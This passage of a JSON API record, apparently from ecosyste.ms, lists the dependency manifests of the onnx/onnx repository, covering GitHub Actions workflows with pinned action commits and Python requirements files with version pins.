ind":"composite","optional":false},{"id":13866775657,"package_name":"reviewdog/action-misspell","ecosystem":"actions","requirements":"9257f108197b44e37995c98bea6ee4a5b9ffc3b0","direct":true,"kind":"composite","optional":false},{"id":13866775658,"package_name":"reviewdog/action-shellcheck","ecosystem":"actions","requirements":"50e5e1e2284575f23a1e409d9c0804cdfc4f6e31","direct":true,"kind":"composite","optional":false},{"id":13866775659,"package_name":"reviewdog/action-cpplint","ecosystem":"actions","requirements":"d5ddf147384ab68e12432bf02815d0e49e5388b2","direct":true,"kind":"composite","optional":false},{"id":13866775660,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"61a6322f88396a6271a6ee3565807d608ecaddd1","direct":true,"kind":"composite","optional":false},{"id":13866775661,"package_name":"github/codeql-action/upload-sarif","ecosystem":"actions","requirements":"cdcdbb579706841c47f7063dda365e292e5cad7a","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/reuse.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T05:49:16.236Z","updated_at":"2023-09-22T05:49:16.236Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/reuse.yml","dependencies":[{"id":13866775717,"package_name":"actions/checkout","ecosystem":"actions","requirements":"f43a0e5ff2bd294095638e18286ca9a3d1956744","direct":true,"kind":"composite","optional":false},{"id":13866775718,"package_name":"fsfe/reuse-action","ecosystem":"actions","requirements":"4f2804894b54004c8ed4b8a62b7c649e54a3aa4b","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/scorecard.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T05:49:17.127Z","updated_at":"2023-09-22T05:49:17.127Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/scorecard.yml","dependencies":[{"id":13866775764,"package_name":"actions/checkout","ecosystem":"actions","requirements":"f43a0e5ff2bd294095638e18286ca9a3d1956744","direct":true,"kind":"composite","optional":false},{"id":13866775765,"package_name":"ossf/scorecard-action","ecosystem":"actions","requirements":"08b4669551908b1024bb425080c797723083c031","direct":true,"kind":"composite","optional":false},{"id":13866775766,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"0b7f8abb1508181956e8e162db84b466c27e18ce","direct":true,"kind":"composite","optional":false},{"id":13866775767,"package_name":"github/codeql-action/upload-sarif","ecosystem":"actions","requirements":"cdcdbb579706841c47f7063dda365e292e5cad7a","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"pypi","filepath":"pyproject.toml","sha":null,"kind":"manifest","created_at":"2023-09-22T05:49:17.295Z","updated_at":"2023-09-22T05:49:17.295Z","repository_link":"https://github.com/onnx/onnx/blob/main/pyproject.toml","dependencies":[]},{"ecosystem":"pypi","filepath":"requirements-lintrunner.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T05:49:17.376Z","updated_at":"2023-09-22T05:49:17.376Z","repository_link":"https://github.com/onnx/onnx/blob/main/requirements-lintrunner.txt","dependencies":[{"id":13866775838,"package_name":"lintrunner-adapters","ecosystem":"pypi","requirements":"\u003e=0.8.0","direct":true,"kind":"runtime","optional":false},{"id":13866775839,"package_name":"ruff","ecosystem":"pypi","requirements":"==0.0.289","direct":true,"kind":"runtime","optional":false},{"id":13866775840,"package_name":"mypy","ecosystem":"pypi","requirements":"==1.5.1","direct":true,"kind":"runtime","optional":false},{"id":13866775841,"package_name":"types-protobuf","ecosystem":"pypi","requirements":"==4.24.0.1","direct":true,"kind":"runtime","optional":false},{"id":13866775842,"package_name":"black","ecosystem":"pypi","requirements":"==23.7.0","direct":true,"kind":"runtime","optional":false},{"id":13866775843,"package_name":"isort","ecosystem":"pypi","requirements":"==5.12.0","direct":true,"kind":"runtime","optional":false},{"id":13866775844,"package_name":"clang-format","ecosystem":"pypi","requirements":"==16.0.6","direct":true,"kind":"runtime","optional":false},{"id":13866775845,"package_name":"editorconfig-checker","ecosystem":"pypi","requirements":"==2.7.2","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"requirements-reference.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T05:49:17.661Z","updated_at":"2023-09-22T05:49:17.661Z","repository_link":"https://github.com/onnx/onnx/blob/main/requirements-reference.txt","dependencies":[{"id":13866776544,"package_name":"google-re2","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":13866776578,"package_name":"Pillow","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"setup.py","sha":null,"kind":"manifest","created_at":"2023-09-22T05:49:17.800Z","updated_at":"2023-09-22T05:49:17.800Z","repository_link":"https://github.com/onnx/onnx/blob/main/setup.py","dependencies":[]},{"ecosystem":"pypi","filepath":"requirements-min.txt","sha":null,"kind":"manifest","created_at":"2024-01-29T19:40:19.675Z","updated_at":"2024-01-29T19:40:19.675Z","repository_link":"https://github.com/onnx/onnx/blob/main/requirements-min.txt","dependencies":[{"id":15905399574,"package_name":"protobuf","ecosystem":"pypi","requirements":"==3.20.2","direct":true,"kind":"runtime","optional":false},{"id":15905399575,"package_name":"protobuf","ecosystem":"pypi","requirements":"==4.25.1","direct":true,"kind":"runtime","optional":false},{"id":15905399576,"package_name":"numpy","ecosystem":"pypi","requirements":"==1.16.6","direct":true,"kind":"runtime","optional":false},{"id":15905399577,"package_name":"numpy","ecosystem":"pypi","requirements":"==1.23.2","direct":true,"kind":"runtime","optional":false},{"id":15905399578,"package_name":"numpy","ecosystem":"pypi","requirements":"==1.26.0","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/main.yml","sha":null,"kind":"manifest","created_at":"2024-04-12T17:31:28.509Z","updated_at":"2024-04-12T17:31:28.509Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/main.yml","dependencies":[{"id":17385153114,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":17385153115,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v5","direct":true,"kind":"composite","optional":false},{"id":17385153116,"package_name":"microsoft/setup-msbuild","ecosystem":"actions","requirements":"6fb02220983dee41ce7ae257b6f4d8f9bf5ed4ce","direct":true,"kind":"composite","optional":false},{"id":17385153117,"package_name":"codecov/codecov-action","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":17385153118,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":17385153119,"package_name":"actions/download-artifact","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":17385153120,"package_name":"EnricoMi/publish-unit-test-result-action","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/create_release.yml","sha":null,"kind":"manifest","created_at":"2024-11-08T05:29:11.171Z","updated_at":"2024-11-08T05:29:11.171Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/create_release.yml","dependencies":[{"id":20622218403,"package_name":"actions/download-artifact","ecosystem":"actions","requirements":"fa0a91b85d4f404e444e00e005971372dc801d16","direct":true,"kind":"composite","optional":false},{"id":20622218404,"package_name":"pypa/gh-action-pypi-publish","ecosystem":"actions","requirements":"15c56dba361d8335944d31a2ecd17d700fc7bcbc","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/pr_checks.yml","sha":null,"kind":"manifest","created_at":"2024-11-08T05:29:11.311Z","updated_at":"2024-11-08T05:29:11.311Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/pr_checks.yml","dependencies":[{"id":20622218405,"package_name":"actions/checkout","ecosystem":"actions","requirements":"11bd71901bbe5b1630ceea73d27597364c9af683","direct":true,"kind":"composite","optional":false},{"id":20622218406,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"0b93645e9fea7318ecaed2b359559ac225c90a2b","direct":true,"kind":"composite","optional":false},{"id":20622218407,"package_name":"parkerbxyz/suggest-changes","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/release_sdist.yml","sha":null,"kind":"manifest","created_at":"2024-11-08T05:29:11.533Z","updated_at":"2024-11-08T05:29:11.533Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/release_sdist.yml","dependencies":[{"id":20622218408,"package_name":"actions/checkout","ecosystem":"actions","requirements":"11bd71901bbe5b1630ceea73d27597364c9af683","direct":true,"kind":"composite","optional":false},{"id":20622218409,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"0b93645e9fea7318ecaed2b359559ac225c90a2b","direct":true,"kind":"composite","optional":false},{"id":20622218410,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"b4b15b8c7c6ac21ea08fcf65892d2ee8f75cf882","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/preview_source_dist_test.yml","sha":null,"kind":"manifest","created_at":"2025-04-15T04:59:54.885Z","updated_at":"2025-04-15T04:59:54.885Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/preview_source_dist_test.yml","dependencies":[{"id":22692240868,"package_name":"actions/checkout","ecosystem":"actions","requirements":"11bd71901bbe5b1630ceea73d27597364c9af683","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/release_win_freethreading.yml","sha":null,"kind":"manifest","created_at":"2025-04-15T04:59:54.989Z","updated_at":"2025-04-15T04:59:54.989Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/release_win_freethreading.yml","dependencies":[{"id":22692240869,"package_name":"actions/checkout","ecosystem":"actions","requirements":"11bd71901bbe5b1630ceea73d27597364c9af683","direct":true,"kind":"composite","optional":false},{"id":22692240870,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"8d9ed9ac5c53483de85588cdf95a591a75ab9f55","direct":true,"kind":"composite","optional":false},{"id":22692240871,"package_name":"microsoft/setup-msbuild","ecosystem":"actions","requirements":"6fb02220983dee41ce7ae257b6f4d8f9bf5ed4ce","direct":true,"kind":"composite","optional":false},{"id":22692240872,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"ea165f8d65b6e75b540449e92b4886f43607fa02","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/release_win_x86_64.yml","sha":null,"kind":"manifest","created_at":"2025-04-15T04:59:55.045Z","updated_at":"2025-04-15T04:59:55.045Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/release_win_x86_64.yml","dependencies":[{"id":22692240873,"package_name":"actions/checkout","ecosystem":"actions","requirements":"11bd71901bbe5b1630ceea73d27597364c9af683","direct":true,"kind":"composite","optional":false},{"id":22692240874,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"8d9ed9ac5c53483de85588cdf95a591a75ab9f55","direct":true,"kind":"composite","optional":false},{"id":22692240875,"package_name":"microsoft/setup-msbuild","ecosystem":"actions","requirements":"6fb02220983dee41ce7ae257b6f4d8f9bf5ed4ce","direct":true,"kind":"composite","optional":false},{"id":22692240876,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"ea165f8d65b6e75b540449e92b4886f43607fa02","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"pypi","filepath":"requirements-dev_freethreading.txt","sha":null,"kind":"manifest","created_at":"2025-04-15T04:59:55.253Z","updated_at":"2025-04-15T04:59:55.253Z","repository_link":"https://github.com/onnx/onnx/blob/main/requirements-dev_freethreading.txt","dependencies":[{"id":22692240877,"package_name":"build","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":22692240878,"package_name":"numpy","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":22692240879,"package_name":"parameterized","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":22692240880,"package_name":"protobuf","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":22692240881,"package_name":"pytest","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":22692240882,"package_name":"pytest-cov","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":22692240883,"package_name":"pytest-xdist","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":22692240884,"package_name":"setuptools","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":22692240885,"package_name":"ml_dtypes","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false}]},{"ecosystem":"pypi","filepath":"requirements-release_build.txt","sha":null,"kind":"manifest","created_at":"2025-04-15T04:59:55.426Z","updated_at":"2025-04-15T04:59:55.426Z","repository_link":"https://github.com/onnx/onnx/blob/main/requirements-release_build.txt","dependencies":[{"id":22692240886,"package_name":"build","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":22692240887,"package_name":"ml_dtypes","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":22692240888,"package_name":"numpy","ecosystem":"pypi","requirements":"==2.0.0","direct":true,"kind":"runtime","optional":false},{"id":22692240889,"package_name":"numpy","ecosystem":"pypi","requirements":"==2.2.0","direct":true,"kind":"runtime","optional":false},{"id":22692240890,"package_name":"parameterized","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":22692240891,"package_name":"protobuf","ecosystem":"pypi","requirements":"==4.25.1","direct":true,"kind":"runtime","optional":false},{"id":22692240892,"package_name":"setuptools","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"requirements-release_freethreading_win.txt","sha":null,"kind":"manifest","created_at":"2025-04-15T04:59:55.481Z","updated_at":"2025-04-15T04:59:55.481Z","repository_link":"https://github.com/onnx/onnx/blob/main/requirements-release_freethreading_win.txt","dependencies":[{"id":22692240893,"package_name":"build","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":22692240894,"package_name":"cmake","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":22692240895,"package_name":"numpy","ecosystem":"pypi","requirements":"==2.2.0","direct":true,"kind":"runtime","optional":false},{"id":22692240896,"package_name":"parameterized","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":22692240897,"package_name":"protobuf","ecosystem":"pypi","requirements":"==4.25.1","direct":true,"kind":"runtime","optional":false},{"id":22692240898,"package_name":"pytest","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":22692240899,"package_name":"pytest-cov","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":22692240900,"package_name":"pytest-xdist","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":22692240901,"package_name":"setuptools","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":22692240902,"package_name":"ml_dtypes","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"requirements-release_test.txt","sha":null,"kind":"manifest","created_at":"2025-04-15T04:59:55.539Z","updated_at":"2025-04-15T04:59:55.539Z","repository_link":"https://github.com/onnx/onnx/blob/main/requirements-release_test.txt","dependencies":[{"id":22692240903,"package_name":"ipython","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":22692240904,"package_name":"ml_dtypes","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":22692240905,"package_name":"nbval","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":22692240906,"package_name":"parameterized","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":22692240907,"package_name":"pytest","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":22692240908,"package_name":"pytest-cov","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":22692240909,"package_name":"pytest-xdist","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false}]}],"score":33.65510252631492,"created_at":"2025-05-08T23:17:33.240Z","updated_at":"2026-06-21T15:01:32.308Z","avatar_url":"https://github.com/onnx.png","language":"Python","codemeta":null,"publiccode":null,"project_url":"https://summary.ecosyste.ms/api/v1/projects/361979","html_url":"https://summary.ecosyste.ms/projects/361979"}